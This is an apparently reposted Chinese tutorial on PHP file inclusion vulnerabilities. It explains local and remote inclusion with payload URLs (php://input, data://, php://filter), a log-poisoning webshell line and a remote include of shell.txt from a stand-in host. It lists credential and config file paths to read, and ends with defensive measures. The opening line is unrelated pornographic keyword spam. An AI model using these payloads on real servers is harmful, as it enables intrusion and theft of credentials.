国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

文件包含漏洞學(xué)習(xí)小結(jié)

這篇具有很好參考價(jià)值的文章主要介紹了文件包含漏洞學(xué)習(xí)小結(jié)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

目錄

一、介紹

二、常見文件包含函數(shù)

三、文件包含漏洞代碼舉例分析

四、文件包含漏洞利用方式

4.1 本地文件包含

1、讀取敏感文件

2、文件包含可運(yùn)行的php代碼

①包含圖片碼

②包含日志文件

③包含環(huán)境變量getshell

④臨時(shí)文件包含

⑤偽協(xié)議

4.2 遠(yuǎn)程文件包含

4.3 文件包含常用路徑

?五、文件包含漏洞防護(hù)


一、介紹

程序在引用文件的時(shí),引用的文件名,用戶可控的情況,傳入的文件名沒有經(jīng)過合理的校驗(yàn)或校驗(yàn)不嚴(yán),從而操作了預(yù)想之外的文件,就有可能導(dǎo)致文件泄漏和惡意的代碼注入。 程序開發(fā)人員一般會(huì)把重復(fù)使用的函數(shù)寫到單個(gè)文件中,需要使用某個(gè)函數(shù)時(shí)直接調(diào)用此文件,而無需再次編寫,這重文件調(diào)用的過程一般被稱為文件包含。程序開發(fā)人員一般希望代碼更靈活,所以將被包含的文件設(shè)置為變量,用來進(jìn)行動(dòng)態(tài)調(diào)用,但正是由于這種靈活性,從而導(dǎo)致客戶端可以調(diào)用一個(gè)惡意文件,造成文件包含漏洞。

幾乎所有腳本語言都會(huì)提供文件包含的功能,但文件包含漏洞在PHPWebApplication 中居多, 而在 JSP、ASP、ASP.NET 程序中卻非常少,甚至沒有,這是有些語言設(shè)計(jì)的弊端。在 PHP 中經(jīng)常出現(xiàn)包含漏洞,但這并不意味這其他語言不存在。

二、常見文件包含函數(shù)

以php為例:

  • require():找不到被包含的文件會(huì)產(chǎn)生致命錯(cuò)誤,并停止腳本運(yùn)行
  • include():找不到被包含的文件只會(huì)產(chǎn)生警告,腳本繼續(xù)執(zhí)行
  • require_once()與require()類似:唯一的區(qū)別是如果該文件的代碼已經(jīng)被包含,則不會(huì)再次包含
  • include_once()與include()類似:唯一的區(qū)別是如果該文件的代碼已經(jīng)被包含,則不會(huì)再次包含
    ?

三、文件包含漏洞代碼舉例分析

文件包含漏洞學(xué)習(xí)小結(jié),滲透,安全,web安全,網(wǎng)絡(luò)安全,系統(tǒng)安全,安全架構(gòu),安全威脅分析

上述代碼中,$_GET['filename']來自客戶的get請(qǐng)求參數(shù),并且其中沒有做任何的檢測(cè)過濾,直接帶入到include包含這個(gè)文件,導(dǎo)致造成文件包含漏洞

四、文件包含漏洞利用方式

4.1 本地文件包含

本地包含文件,被包含的文件在服務(wù)器

1、讀取敏感文件

比如包含敏感文件/etc/passwd

文件包含漏洞學(xué)習(xí)小結(jié),滲透,安全,web安全,網(wǎng)絡(luò)安全,系統(tǒng)安全,安全架構(gòu),安全威脅分析

../是上一級(jí)路徑。如果存在漏洞,文件又存在的時(shí)候,不是php 文件會(huì)被讀取顯示在頁(yè)面中,這里我操作系統(tǒng)是windows,所以不存在這個(gè)文件

2、文件包含可運(yùn)行的php代碼

  • ①包含圖片碼

尋找網(wǎng)站上傳點(diǎn),把 php 惡意代碼文件改成 jpg 上傳到網(wǎng)站上,本地包含引入惡意代碼,當(dāng)文件被引入后代碼就被執(zhí)行。 保存為 shell.jpg 上傳圖片格式到網(wǎng)站 再用文件包含漏洞引入圖片 成功執(zhí)行代碼

文件包含漏洞學(xué)習(xí)小結(jié),滲透,安全,web安全,網(wǎng)絡(luò)安全,系統(tǒng)安全,安全架構(gòu),安全威脅分析

文件包含漏洞學(xué)習(xí)小結(jié),滲透,安全,web安全,網(wǎng)絡(luò)安全,系統(tǒng)安全,安全架構(gòu),安全威脅分析

  • ②包含日志文件

中間件例如 iis 、apache、nginx 這些 web 中間件,都會(huì)記錄訪問日志,如果訪問日志中或錯(cuò)誤日志中,存在有 php 代碼,也可以引入到文件包含中。如果日志 有 php 惡意代碼,也可導(dǎo)致 getshell。

更多日志文件路徑參考:應(yīng)急響應(yīng)之日志收集_dayouziei的博客-CSDN博客

首先get請(qǐng)求下網(wǎng)站

<?php phpinfo();eval($_POST[cmd]);?>

在中間件日志中會(huì)有這條記錄,我這里被編碼了

文件包含漏洞學(xué)習(xí)小結(jié),滲透,安全,web安全,網(wǎng)絡(luò)安全,系統(tǒng)安全,安全架構(gòu),安全威脅分析

文件包含漏洞中包含這個(gè)文件即可(需要有訪問這個(gè)文件的權(quán)限

文件包含漏洞學(xué)習(xí)小結(jié),滲透,安全,web安全,網(wǎng)絡(luò)安全,系統(tǒng)安全,安全架構(gòu),安全威脅分析

  • ③包含環(huán)境變量getshell

修改 User-Agen 填寫 php 代碼

文件包含漏洞學(xué)習(xí)小結(jié),滲透,安全,web安全,網(wǎng)絡(luò)安全,系統(tǒng)安全,安全架構(gòu),安全威脅分析

在linux 中,/proc/self/environ 這個(gè)文件里保存了系統(tǒng)的一些變量,如果權(quán)限足夠,包含這個(gè)文件也可執(zhí)行腳本

  • ④臨時(shí)文件包含

phpinfo會(huì)打印上傳緩存文件路徑,如果目標(biāo)網(wǎng)站有phpinfo的頁(yè)面,我們可以向該頁(yè)面POST一個(gè)文件,在phpinfo頁(yè)面中抓取緩存文件路徑,在利用時(shí)間競(jìng)爭(zhēng),就可以執(zhí)行我們的惡意代碼

PHP的POST臨時(shí)文件機(jī)制

我們對(duì)任意一個(gè)PHP文件發(fā)送一個(gè)上傳的數(shù)據(jù)包時(shí),不管這個(gè)PHP服務(wù)后端是否有處理$_FILES的邏輯,PHP都會(huì)將用戶上傳的數(shù)據(jù)先保存到一個(gè)臨時(shí)文件中,這個(gè)文件一般位于系統(tǒng)臨時(shí)目錄,文件名是php開頭,后面跟6個(gè)隨機(jī)字符;在整個(gè)PHP文件執(zhí)行完畢后,這些上傳的臨時(shí)文件就會(huì)被清理掉。

  • ?該文件默認(rèn)存儲(chǔ)在 /tmp 目錄中『可通過 php.ini 的 upload_tmp_dir 指定存儲(chǔ)位置』
  • ?文件名為 php[6個(gè)隨機(jī)字符],例:phpG4ef0q
  • ?若本次請(qǐng)求正常結(jié)束,臨時(shí)文件會(huì)被自動(dòng)刪除
  • ?若非正常結(jié)束,比如崩潰,臨時(shí)文件可能會(huì)被永久保留
⑤偽協(xié)議

PHP內(nèi)置了很多URL風(fēng)格的封裝協(xié)議,可用于類似fopen()、copy()、file_exists()和filesize()的文件系統(tǒng)函數(shù)

常見的偽協(xié)議

  • file:// — 訪問本地文件系統(tǒng)
  • http:// — 訪問 HTTP(s) 網(wǎng)址
  • ftp:// — 訪問 FTP(s) URLs
  • php:// — 訪問各個(gè)輸入/輸出流(I/O streams)
  • zlib:// — 壓縮流
  • data:// — 數(shù)據(jù)(RFC 2397)
  • glob:// — 查找匹配的文件路徑模式
  • phar:// — PHP 歸檔
  • ssh2:// — Secure Shell 2
  • rar:// — RAR
  • ogg:// — 音頻流
  • expect:// — 處理交互式的流

php.ini 參數(shù)設(shè)置

在 php.ini 里有兩個(gè)重要的參數(shù) allow_url_fopen、allow_url_include。allow_url_fopen:默認(rèn)值是 ON。允許 url 里的封裝協(xié)議訪問文件;allow_url_include:默認(rèn)值是 OFF。不允許包含 url 里的封裝協(xié)議包含文件;各協(xié)議的利用條件和方法:

協(xié)議 測(cè)試php版本 allow_url_fopen allow_url_include 用法
file:// >=5.2 off/on off/on ?file=file://D:/phpstudy/www/index.php
php://filter >=5.2 off/on off/on ?file=php://filter/read=conver.base64-encode/resouece=./index.php
php://input >=5.2 off/on on ?file=php://input [POST DATA] <?phpinfo();?>
zip:// >=5.2 off/on off/on ?file=zip://d:/phpstudy/www/file.zip%23test.php
compress.bzip2:// >=5.2 off/on off/on ?file=compress.bzip2://D:/phpstudy/www/file.bz2
compress.zlib:// >=5.2 off/on off/on ?file=compress.zlib://D:/phpstudy/www/file.gz
data:// >=5.2 on on ?file=data://text/plain,<?phpinfo();?>
  • file://協(xié)議

file://?用于訪問本地文件系統(tǒng),在CTF中通常用來讀取本地文件的且不受allow_url_fopen與allow_url_include的影響
文件包含漏洞學(xué)習(xí)小結(jié),滲透,安全,web安全,網(wǎng)絡(luò)安全,系統(tǒng)安全,安全架構(gòu),安全威脅分析

file:// [文件的絕對(duì)路徑和文件名]

  • php://協(xié)議

php:// 訪問各個(gè)輸入/輸出流(I/O streams),在CTF中經(jīng)常使用的是php://filterphp://input
php://filter用于讀取源碼。
php://input用于執(zhí)行php代碼。

php://filter?讀取源代碼并進(jìn)行base64編碼輸出,不然會(huì)直接當(dāng)做php代碼執(zhí)行就看不到源代碼內(nèi)容了。
利用條件:

  • allow_url_fopen :off/on
  • allow_url_include:off/on
  • zip://協(xié)議

zip:// 可以訪問壓縮包里面的文件。當(dāng)它與包含函數(shù)結(jié)合時(shí),zip://流會(huì)被當(dāng)作php文件執(zhí)行。從而實(shí)現(xiàn)任意代碼執(zhí)行。

zip://中只能傳入絕對(duì)路徑。
要用#分割壓縮包和壓縮包里的內(nèi)容,并且#要用url編碼成%23(即下述POC中#要用%23替換)
只需要是zip的壓縮包即可,后綴名可以任意更改。
相同的類型還有zlib://和bzip2://
?

利用條件:

  • allow_url_fopen :off/on
  • allow_url_include:off/on
  • data://協(xié)議

data:// 同樣類似與php://input,可以讓用戶來控制輸入流,當(dāng)它與包含函數(shù)結(jié)合時(shí),用戶輸入的data://流會(huì)被當(dāng)作php文件執(zhí)行。從而導(dǎo)致任意代碼執(zhí)行。

利用data:// 偽協(xié)議可以直接達(dá)到執(zhí)行php代碼的效果,例如執(zhí)行phpinfo()函數(shù):
利用條件:

allow_url_fopen :on
allow_url_include:on
?

4.2 遠(yuǎn)程文件包含

當(dāng)遠(yuǎn)程文件開啟時(shí),可以包含遠(yuǎn)程文件到本地執(zhí)行。當(dāng)allow_url_fopen=Onallow_url_include=ON 兩個(gè)條件同時(shí)為 On

http://127.0.0.1/lfi.php?file=http://10.10.10.10/shell.txt?

4.3 文件包含常用路徑

  • 包含日志文件

/usr/local/apache2/logs/access_log /logs/access_log /etc/httpd/logs/access_log /var/log/httpd/access_log

  • 讀取網(wǎng)站配置文件

dedecms 數(shù)據(jù)庫(kù)配置文件

data/common.inc.php,

discuz 全局配置文件 config/config_global.php,

phpcms 配置文件 caches/configs/database.php

phpwind 配置文件 conf/database.php

wordpress 配置文件 wp-config.php

  • 包含系統(tǒng)配置文件

windows
C:/boot.ini//查看系統(tǒng)版本
C:/Windows/System32/inetsrv/MetaBase.xml//IIS 配置文件C:/Windows/repairsam//存儲(chǔ)系統(tǒng)初次安裝的密碼
C:/Program Files/mysql/my.ini//Mysql 配置
C:/Program Files/mysql/data/mysql/user.MYD//Mysql root
C:/Windows/php.ini//php 配置信息
C:/Windows/my.ini//Mysql 配置信息
linux
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_ras.keystore
/root/.ssh/known_hosts
/etc/passwd
/etc/shadow
/etc/my.cnf
/etc/httpd/conf/httpd.conf
/root/.bash_history
/root/.mysql_history
/proc/self/fd/fd[0-9]*(文件標(biāo)識(shí)符)
/proc/mounts
/porc/config.gz文章來源地址http://www.zghlxwxcb.cn/news/detail-696587.html

?五、文件包含漏洞防護(hù)

  • 1、使用str_replace等方法過濾掉危險(xiǎn)字符
  • 2、配置open_basedir,防止目錄遍歷(open_basedir 將php所能打開的文件限制在指定的目錄樹中)
  • 3、php版本升級(jí),防止%00截?cái)?/li>
  • 4、對(duì)上傳的文件進(jìn)行重命名,防止被讀取
  • 5、對(duì)于動(dòng)態(tài)包含的文件可以設(shè)置一個(gè)白名單,不讀取非白名單的文件。
  • 6、做好管理員權(quán)限劃分,做好文件的權(quán)限管理,allow_url_include和allow_url_fopen最小權(quán)限化

到了這里,關(guān)于文件包含漏洞學(xué)習(xí)小結(jié)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • web滲透安全學(xué)習(xí)筆記:1、入門基礎(chǔ)知識(shí)/ XXS漏洞

    web滲透安全學(xué)習(xí)筆記:1、入門基礎(chǔ)知識(shí)/ XXS漏洞

    ? ? 自編寫python滲透工具編寫學(xué)習(xí)筆記專欄以來,筆者便發(fā)現(xiàn)了一個(gè)較為嚴(yán)重的問題:我們大多數(shù)文章都是學(xué)習(xí)如何用python編寫掃描與利用漏洞的滲透工具,卻沒有真正解析漏洞的形成原因,長(zhǎng)此以往我們的學(xué)習(xí)就只會(huì)浮于表面,廣而不深。為了改變這一現(xiàn)狀,筆者決定以深

    2024年02月03日
    瀏覽(25)
  • 學(xué)網(wǎng)絡(luò)安全怎么挖漏洞?怎么滲透?

    學(xué)網(wǎng)絡(luò)安全怎么挖漏洞?怎么滲透?

    前言 有不少閱讀過我文章的伙伴都知道,我從事網(wǎng)絡(luò)安全行業(yè)已經(jīng)好幾年,積累了豐富的經(jīng)驗(yàn)和技能。在這段時(shí)間里,我參與了多個(gè)實(shí)際項(xiàng)目的規(guī)劃和實(shí)施,成功防范了各種網(wǎng)絡(luò)攻擊和漏洞利用,提高了安全防護(hù)水平。 也有很多小伙伴私信問我怎么學(xué)?怎么挖漏洞?怎么滲

    2024年02月04日
    瀏覽(28)
  • 網(wǎng)絡(luò)安全進(jìn)階學(xué)習(xí)第五課——文件上傳漏洞

    網(wǎng)絡(luò)安全進(jìn)階學(xué)習(xí)第五課——文件上傳漏洞

    大部分的網(wǎng)站和應(yīng)用系統(tǒng)都有上傳功能,如用戶頭像上傳,圖片上傳,文檔上傳等。 由于對(duì)上傳文件 未作過濾 或 過濾機(jī)制不嚴(yán)(文件后綴或類型) ,導(dǎo)致惡意用戶可以上傳 腳本文件 ,通過上傳文件可以達(dá)到控制網(wǎng)站權(quán)限的目的。 攻擊者可獲得網(wǎng)站控制權(quán)限; 查看、修改

    2024年02月06日
    瀏覽(25)
  • [滲透測(cè)試]—5.1 網(wǎng)絡(luò)設(shè)備的安全漏洞

    [滲透測(cè)試]—5.1 網(wǎng)絡(luò)設(shè)備的安全漏洞

    在這一章節(jié)中,我們將重點(diǎn)討論網(wǎng)絡(luò)設(shè)備(如路由器、交換機(jī)等)的安全漏洞,以及如何進(jìn)行網(wǎng)絡(luò)設(shè)備的滲透測(cè)試。請(qǐng)放心,我們會(huì)盡量講得詳細(xì)、通俗易懂,并提供盡可能多的實(shí)例。 網(wǎng)絡(luò)設(shè)備,如路由器和交換機(jī),是構(gòu)成計(jì)算機(jī)網(wǎng)絡(luò)的基本元素。這些設(shè)備負(fù)責(zé)在網(wǎng)絡(luò)中轉(zhuǎn)發(fā)

    2024年02月11日
    瀏覽(23)
  • [滲透測(cè)試]—6.2 無線網(wǎng)絡(luò)安全漏洞和攻擊技術(shù)

    [滲透測(cè)試]—6.2 無線網(wǎng)絡(luò)安全漏洞和攻擊技術(shù)

    在本章節(jié)中,我們將學(xué)習(xí)一些常見的無線網(wǎng)絡(luò)安全漏洞和攻擊技術(shù),如WPS漏洞、Evil Twin攻擊等。我們將盡量講解得詳細(xì)、通俗易懂,并提供盡可能多的實(shí)例。 Wi-Fi保護(hù)設(shè)置(WPS)是一種簡(jiǎn)化無線網(wǎng)絡(luò)配置的技術(shù),可以通過輸入PIN碼或按下物理按鈕的方式快速連接無線網(wǎng)絡(luò)。然

    2024年02月11日
    瀏覽(60)
  • 信息服務(wù)上線滲透檢測(cè)網(wǎng)絡(luò)安全檢查報(bào)告和解決方案4(網(wǎng)站風(fēng)險(xiǎn)等級(jí)評(píng)定標(biāo)準(zhǔn)、漏洞危害分級(jí)標(biāo)準(zhǔn)、漏洞安全建議)

    信息服務(wù)上線滲透檢測(cè)網(wǎng)絡(luò)安全檢查報(bào)告和解決方案4(網(wǎng)站風(fēng)險(xiǎn)等級(jí)評(píng)定標(biāo)準(zhǔn)、漏洞危害分級(jí)標(biāo)準(zhǔn)、漏洞安全建議)

    信息服務(wù)上線滲透檢測(cè)網(wǎng)絡(luò)安全檢查報(bào)告和解決方案3(系統(tǒng)漏洞掃描、相對(duì)路徑覆蓋RPO漏洞、nginx漏洞修復(fù)) 信息服務(wù)上線滲透檢測(cè)網(wǎng)絡(luò)安全檢查報(bào)告和解決方案2(安裝文件信息泄漏、管理路徑泄漏、XSS漏洞、弱口令、邏輯漏洞、終極上傳漏洞升級(jí)) 信息服務(wù)上線滲透檢測(cè)網(wǎng)絡(luò)安

    2024年02月12日
    瀏覽(29)
  • 有哪些信息安全/網(wǎng)絡(luò)安全/滲透測(cè)試/眾測(cè)/CTF/紅藍(lán)攻防/漏洞測(cè)試等前沿技術(shù)/研究/技巧獲取渠道?

    有哪些信息安全/網(wǎng)絡(luò)安全/滲透測(cè)試/眾測(cè)/CTF/紅藍(lán)攻防/漏洞測(cè)試等前沿技術(shù)/研究/技巧獲取渠道?

    護(hù)網(wǎng)的定義是以國(guó)家組織組織事業(yè)單位、國(guó)企單位、名企單位等開展攻防兩方的網(wǎng)絡(luò)安全演習(xí)。進(jìn)攻方一個(gè)月內(nèi)采取不限方式對(duì)防守方展開進(jìn)攻,不管任何手段只要攻破防守方的網(wǎng)絡(luò)并且留下標(biāo)記即成功,直接沖到防守方的辦公大樓,然后物理攻破也算成功。護(hù)網(wǎng)是國(guó)家應(yīng)對(duì)

    2024年02月06日
    瀏覽(25)
  • 網(wǎng)絡(luò)安全入門 5 天速成教程_ WEB 安全滲透攻防技術(shù)

    網(wǎng)絡(luò)安全入門 5 天速成教程_ WEB 安全滲透攻防技術(shù)

    前言 隨著 Web 技術(shù)發(fā)展越來越成熟,而非 Web 服務(wù)越來越少的暴露在互聯(lián)網(wǎng)上,現(xiàn)在互聯(lián)網(wǎng)安全主要指的是 Web 安全。 為了自身不“裸奔”在大數(shù)據(jù)里,漸漸開始學(xué)習(xí) Web 安全,在學(xué)習(xí) Web 安全的過程中,發(fā)現(xiàn)很大一部分知識(shí)點(diǎn)都相對(duì)零散,如果沒有相對(duì)清晰 的脈絡(luò)作為參考,

    2024年04月23日
    瀏覽(35)
  • 網(wǎng)絡(luò)安全B模塊(筆記詳解)- Web滲透測(cè)試

    網(wǎng)絡(luò)安全B模塊(筆記詳解)- Web滲透測(cè)試

    1.通過滲透機(jī)Kali1.0對(duì)服務(wù)器場(chǎng)景PYsystem20192進(jìn)行Web滲透測(cè)試(使用工具w3af的對(duì)目標(biāo)Web服務(wù)器進(jìn)行審計(jì)),在w3af的命令行界面下,使用命令列出所有用于審計(jì)的插件,將該操作使用的命令作為Flag值提交; 進(jìn)入kali命令控制臺(tái)中使用命令w3af_console進(jìn)入w3af命令行模式,通過輸入命令

    2024年01月25日
    瀏覽(29)
  • 網(wǎng)絡(luò)安全從業(yè)人員應(yīng)該如何提升自身的web滲透能力?

    網(wǎng)絡(luò)安全從業(yè)人員應(yīng)該如何提升自身的web滲透能力?

    前言 web 滲透這個(gè)東西學(xué)起來如果沒有頭緒和路線的話,是非常燒腦的。 理清 web 滲透學(xué)習(xí)思路,把自己的學(xué)習(xí)方案和需要學(xué)習(xí)的點(diǎn)全部整理,你會(huì)發(fā)現(xiàn)突然滲透思路就有點(diǎn)眉目了。 程序員之間流行一個(gè)詞,叫 35 歲危機(jī),,意思就是說 35 歲是個(gè)坎,容易被淘汰。 那么安全行

    2023年04月09日
    瀏覽(26)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包